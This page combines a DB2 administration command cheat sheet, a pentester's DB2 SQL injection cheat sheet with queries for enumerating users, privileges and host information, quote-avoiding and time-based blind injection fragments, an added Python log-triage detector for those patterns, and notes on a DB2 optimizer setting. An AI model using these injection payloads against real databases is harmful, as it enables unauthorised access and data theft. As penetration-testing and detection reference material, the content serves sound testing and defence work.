
DB2 cheat sheet

Some useful DB2 commands

DB2 System Commands


DB2LEVEL -- checks version of DB2 installed.
DB2ILIST -- lists all instances installed
DB2CMD -- opens a command line processor
DB2CC -- opens db2 control center
DB2LICM -l -- gets db2 type.

Command Line Processor Commands


DB2 LIST NODE DIRECTORY -- lists all nodes
DB2 CATALOG TCPIP NODE DB2NODE REMOTE MACHINE215 SERVER 50000 -- catalogs node. In this case, node is db2Node on the machine with name machine215. Port is 50000.
DB2 LIST DATABASE DIRECTORY -- list databases
DB2 GET DB CFG FOR SAMPLE -- get configuration info for the SAMPLE db.
DB2 CONNECT TO alexDB USER myuser USING mypass -- connect to db. In this case, database is alexdb, user is myuser and password is mypass.
DB2 DISCONNECT alexdb -- disconnects
DB2 LIST APPLICATIONS SHOW DETAIL -- shows all running db's
DB2 GET DBM CFG -- view authentication parameter (e.g. something like server_encrypt)
DB2 UPDATE DBM CFG USING AUTHENTICATION SERVER_ENCRYPT -- alter the authentication mechanism to server_encrypt
DB2 GET AUTHORIZATIONS -- get authorisation level.

Database commands via Command Line Processor (CLP)


DB2 GET DATABASE CONFIGURATION -- gets current database configuration
DB2 VALUES CURRENT USER -- gets the current user
DB2 VALUES CURRENT SCHEMA -- gets the current schema
DB2 VALUES CURRENT QUERY OPTIMIZATION -- get query optimization level.

Schemas

DB2 SELECT SCHEMANAME FROM SYSCAT.SCHEMATA -- list all schemas
DB2 VALUES CURRENT SCHEMA -- gets the current schema
DB2 SET SCHEMA ALEXSCHEMA -- set schema

Tables

DB2 LIST TABLES FOR schema_name -- list all tables for particular schema
DB2 LIST TABLES SHOW DETAIL; -- show detail about tables
DECLARE GLOBAL TEMPORARY TABLE -- declares a temporary table
CREATE TABLE MQT AS (SELECT c.cust_name, c.cust_id, a.balance FROM customer c, account a WHERE c.cust_name IN ('Alex') AND a.customer_id = c.cust_id) DATA INITIALLY DEFERRED REFRESH DEFERRED -- creates a materialised query table. In this case the MQT is based on a join query from the customer and account table.

Tablespaces

DB2 LIST TABLESPACES SHOW DETAIL -- show detail about table spaces
SELECT * FROM SYSCAT.TABLESPACES; -- show what syscat has about tablespaces
SELECT tbspace, bufferpoolid from syscat.tablespaces; -- get tablespace and bufferpoolid
SELECT TABNAME FROM SYSCAT.TABLES WHERE TBSPACE=2; -- check what TABLES are in tablespace where id = 2.

Constraints

SELECT * FROM SYSCAT.TABCONST; -- Table constraints
SELECT * FROM SYSCAT.CHECKS; -- Column checks
SELECT * FROM SYSCAT.COLCHECKS; -- Column constraints
SELECT * FROM SYSCAT.REFERENCES; -- Referential constraints

Sequences

CREATE SEQUENCE STESTRESULT AS INTEGER INCREMENT BY 1 START WITH 1 NO MINVALUE NO MAXVALUE NO CYCLE CACHE 10 ORDER; -- creates a sequence starting with 1 which caches 10 values
SELECT * FROM SYSCAT.SEQUENCES; -- gets syscat info on sequences
VALUES NEXT VALUE FOR MYSEQ; -- gets next value from sequence myseq
ALTER SEQUENCE MYSEQ RESTART WITH 11 INCREMENT BY 1 MAXVALUE 10000 CYCLE CACHE 12 ORDER -- changes MySeq sequence

Locksize

SELECT TABNAME, LOCKSIZE FROM SYSCAT.TABLES WHERE TABNAME = 'EMPLOYEES'; -- check locksize, which can be tablespace, table, partition, page, row (usually row).

Bufferpools

SELECT bpname, npages, pagesize from syscat.bufferpools -- get useful buffer pool info.
SELECT buffer.bufferpoolid, buffer.bpname, buffer.npages, buffer.pagesize, tablespace.tbspace, tablespace.tbspaceid from syscat.bufferpools buffer, syscat.tablespaces tablespace where tablespace.bufferpoolid = buffer.bufferpoolid; -- gets buffer pool and corresponding tablespace info.

Indexes

SELECT * FROM SYSCAT.INDEXES -- show all indexes
SELECT COLNAMES, TABNAME, INDEXTYPE, CLUSTERRATIO, CLUSTERFACTOR FROM SYSCAT.INDEXES WHERE TABNAME = 'TPERSON'; -- some useful columns

Functions

SELECT * FROM SYSCAT.FUNCTIONS; -- check what functions DB has.

SYSDUMMY1 commands

SELECT CURRENT DATE FROM SYSIBM.SYSDUMMY1; -- gets current date.
SELECT HEX(36) FROM SYSIBM.SYSDUMMY1; -- same as VALUES HEX(36)

SELECT XMLCOMMENT ('This is an XML comment') FROM SYSIBM.SYSDUMMY1;

Runstats

RUNSTATS ON TABLE TAUSER1.TOSUSER FOR INDEXES ALL; -- runstats for all indexes

Checking the last time runstats was run...

SELECT CARD, STATS_TIME FROM SYSCAT.TABLES WHERE TABNAME = 'TOSUSER';
SELECT NLEAF, NLEVELS, FULLKEYCARD, STATS_TIME, TABNAME, INDNAME FROM SYSCAT.INDEXES WHERE TABNAME = 'TOSUSER';

The following catalog columns can be queried to determine if RUNSTATS has been performed on the tables and indexes:

If the CARD column of the SYSCAT.TABLES view displays a value of -1, or the STATS_TIME column displays a NULL value for a table, then the RUNSTATS utility has not run for that table.

If the NLEAF, NLEVELS and FULLKEYCARD columns of the SYSCAT.INDEXES view display a value of -1, or the STATS_TIME column displays a NULL value for an index, then the RUNSTATS utility has not run for that index.

DB2 SQL injection cheat sheet


Posted on 20/05/2012 by Adrián

Note: There is a Spanish version of this post here.

I'm sure we all (pentesters) make extensive use of pentestmonkey's SQL injection cheat sheets. They are touchstones when it comes down to SQL injection, and most of the time they save the day. However, the DB2 cheat sheet is one of the less complete ones on pentestmonkey's website. It might be because it's not a very common database engine and a fairly complex one. I've had the luck? of coming across lots of DB2 systems in my last and also in my current job. Hence the missing information was extremely annoying.

Following these lines there is a table with an updated DB2 SQL injection cheat sheet, using pentestmonkey's as a starting point. The updated/modified or new fields are marked with an asterisk (*). All of these queries have been tested on a Win32+DB2 v10.1.0, although I've also had the chance to test some on Z/OS+DB2 v9.x and v8.x and most of them work fine. Please note that I'm not a DB2 expert, so if you find errors or inaccurate information, or you know other exciting tricks, please feel free to contact me. Finally, I've uploaded some DB2 dumps of default privileges, tables with PUBLIC access, and other interesting stuff.

Version*

select service_level from table(sysproc.env_get_inst_info()) as instanceinfo
select getvariable('sysibm.version') from sysibm.sysdummy1 -- (v8+)
select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo
select service_level,bld_level from sysibmadm.env_inst_info

Comments

select blah from foo -- comment like this (double dash)

Current User

select user from sysibm.sysdummy1
select session_user from sysibm.sysdummy1
select system_user from sysibm.sysdummy1

List Users*

DB2 uses OS accounts. Those with DB2 access can be retrieved with:

select distinct(authid) from sysibmadm.privileges -- priv required
select grantee from syscat.dbauth -- incomplete results
select distinct(definer) from syscat.schemata -- more accurate
select distinct(grantee) from sysibm.systabauth -- same as previous

List Password Hashes

N/A (OS User Accounts)

List Privileges

select * from syscat.tabauth -- shows priv on tables
select * from syscat.tabauth where grantee = current user -- shows privs for current user

List DBA Accounts*

select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y'

Current Database

select current server from sysibm.sysdummy1

List Databases*

select distinct(table_catalog) from sysibm.tables

List Columns*

select name, tbname, coltype from sysibm.syscolumns -- also valid syscat and sysstat

List Tables

select table_name from sysibm.tables
select name from sysibm.systables

Find Tables From Column Name

select tbname from sysibm.syscolumns where name='username'

Select Nth Row*

select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only

Select Nth Char

select substr('abc',2,1) FROM sysibm.sysdummy1 -- returns b

Bitwise AND/OR/NOT/XOR*

select bitand(1,0) from sysibm.sysdummy1 -- returns 0. Also available: bitandnot, bitor, bitxor, bitnot

ASCII Value -> Char

select chr(65) from sysibm.sysdummy1 -- returns A

Char -> ASCII Value

select ascii('A') from sysibm.sysdummy1 -- returns 65

Casting

select cast('123' as integer) from sysibm.sysdummy1
select cast(1 as char) from sysibm.sysdummy1

String Concat

select 'a' concat 'b' concat 'c' from sysibm.sysdummy1 -- returns abc
select 'a' || 'b' from sysibm.sysdummy1 -- returns ab

IF Statement*

Seems only allowed in stored procedures. Use case logic instead.

Case Statement*

select CASE WHEN (1=1) THEN 'AAAAAAAAAA' ELSE 'BBBBBBBBBB' END from sysibm.sysdummy1

Avoiding Quotes*

SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1 -- returns ADRI. Works without select too

Time Delay*

Heavy queries, for example:

and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68

If user starts with ascii 68 (D), the heavy query will be executed, delaying the response. However, if user doesn't start with ascii 68, the heavy query won't execute and thus the response will be faster.

Serialize to XML (for error based)*

select xmlagg(xmlrow(table_schema)) from sysibm.tables -- returns all in one xml-formatted string
select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables) -- same but without repeated elements
select xml2clob(xmlelement(name t, table_schema)) from sysibm.tables -- returns all in one xml-formatted string (v8). May need CAST(xml2clob(...) AS varchar(500)) to display the result.

Make DNS Requests

N/A

Command Execution

Seems it's only allowed from procedures or UDFs.

Local File Access

I think this is only available through stored procedures or db2 tool.

Hostname/IP and OS INFO*

select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info -- requires priv

Location of DB Files*

select * from sysibmadm.reg_variables where reg_var_name='DB2PATH' -- requires priv

System Config*

select dbpartitionnum, name, value from sysibmadm.dbcfg where name like 'auto_%' -- requires priv. Retrieve the automatic maintenance settings in the database configuration that are stored in memory for all database partitions.
select name, deferred_value, dbpartitionnum from sysibmadm.dbcfg -- requires priv. Retrieve all the database configuration parameters values stored on disk for all database partitions.

Default System Databases*

What makes sense for DB2 is to know default System Schemas (and maybe tables): SYSIBM/SYSCAT/SYSSTAT/SYSPUBLIC/SYSIBMADM/SYSTOOLS
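From the defender's side, the queries in this cheat sheet leave recognizable fingerprints in request logs: references to the DB2 system schemas, the chr() concatenation used to avoid quotes, the ascii(substr(...)) character probe and the multi-way join on sysibm.columns used as a time delay. The following is an added example, not part of the original post: a small log triage script whose rule names, weights, threshold and sample request lines are all assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Fingerprints taken from the queries listed in the cheat sheet above.
# Rule names and weights are assumptions made for this example.
RULES = [
    ("catalog_schema", 2, re.compile(r"\b(sysibm|syscat|sysstat|sysibmadm|sysproc)\s*\.\s*\w+", re.I)),
    ("heavy_join_delay", 3, re.compile(r"count\s*\(\s*\*\s*\)\s+from\s+sysibm\.\w+\s+\w+\s*,\s*sysibm\.\w+", re.I)),
    ("chr_concat", 2, re.compile(r"chr\s*\(\s*\d+\s*\)\s*(\|\||concat)\s*chr\s*\(", re.I)),
    ("char_probe", 2, re.compile(r"ascii\s*\(\s*substr\s*\(", re.I)),
    ("xml_serialize", 1, re.compile(r"\b(xmlagg|xmlrow|xml2clob)\s*\(", re.I)),
    ("nth_row", 1, re.compile(r"fetch\s+first\s+\d*\s*rows?\s+only", re.I)),
]

def normalize(value: str) -> str:
    """URL-decode twice (catches double encoding), drop /* */ comments, collapse whitespace."""
    for _ in range(2):
        value = unquote_plus(value)
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value)

def score(value: str):
    """Return (total weight, matching rule names) for one logged request line."""
    text = normalize(value)
    hits = [(name, weight) for name, weight, rx in RULES if rx.search(text)]
    return sum(w for _, w in hits), [n for n, _ in hits]

def triage(lines, threshold=3):
    """Return (line_no, score, rule names) for every line at or above threshold."""
    out = []
    for no, line in enumerate(lines, 1):
        total, names = score(line)
        if total >= threshold:
            out.append((no, total, names))
    return out

# Constructed sample request lines (not real traffic).
SAMPLE = [
    "GET /item?id=42 HTTP/1.1",
    "GET /item?id=42+and+(select+ascii(substr(user,1,1))+from+sysibm.sysdummy1)=68 HTTP/1.1",
    "GET /search?q=fetch+first+aid+kit HTTP/1.1",
    "GET /item?id=1%2520and%2520(SELECT%2520count(*)%2520from%2520sysibm.columns%2520t1,%2520sysibm.columns%2520t2)>0 HTTP/1.1",
    "GET /item?name=chr(65)||chr(68)||chr(82) HTTP/1.1",
]

if __name__ == "__main__":
    for no, total, names in triage(SAMPLE):
        print(no, total, names)
```

A single low-weight match, such as the chr() chain on its own or an ordinary search phrase, stays below the threshold; tune the weights against your own application's legitimate traffic before alerting on them.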

Setting the DB2_REDUCED_OPTIMIZATION registry variable


If setting the optimization class does not reduce the compilation time sufficiently for your application, try setting the DB2_REDUCED_OPTIMIZATION registry variable. This registry variable provides more control over the optimizer's search space than setting the optimization class. This registry variable lets you request either reduced optimization features or rigid use of optimization features at the specified optimization class. If you reduce the number of optimization techniques used, you also reduce time and resource use during optimization. Although optimization time and resource use might be reduced, there is increased risk of producing a less than optimal query access plan.

First, try setting the registry variable to YES. If the optimization class is 5 (the default) or lower, the optimizer disables some optimization techniques that might consume significant prepare time and resources but that do not usually produce a better query access plan. If the optimization class is exactly 5, the optimizer reduces or disables some additional techniques, which might further reduce optimization time and resource use, but also further increase the risk of a less than optimal query access plan. For optimization classes lower than 5, some of these techniques might not be in effect in any case. If they are, however, they remain in effect.

If the YES setting does not provide a sufficient reduction in compilation time, try setting the registry variable to an integer value. The effect is the same as YES, with the following additional behavior for dynamically prepared queries optimized at class 5. If the total number of joins in any query block exceeds the setting, the optimizer switches to greedy join enumeration instead of disabling additional optimization techniques. The result is that the query will be optimized at a level that is similar to optimization class 2.
